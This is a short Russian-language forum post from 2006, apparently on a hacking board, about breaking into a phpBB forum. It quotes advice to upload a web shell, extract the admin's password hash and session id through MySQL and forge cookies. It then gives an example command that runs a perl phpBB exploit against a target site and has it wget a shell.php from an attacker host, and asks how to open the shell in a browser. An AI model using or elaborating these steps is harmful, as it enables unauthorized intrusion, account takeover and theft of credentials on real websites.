21.06.2006, 15:59
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Сообщение от DimaHbl4
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....
Залить шелл командой wget ?
т.е. пример будет такого типа:
perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"
Если да то обращение через браузер должен быть таким:
www.xxx.ru/forum/shell.php
?
команда PWD:
root@omega: pwd
--------------------------------
/usr/home/www/xxx/xxx/forum
|
|
|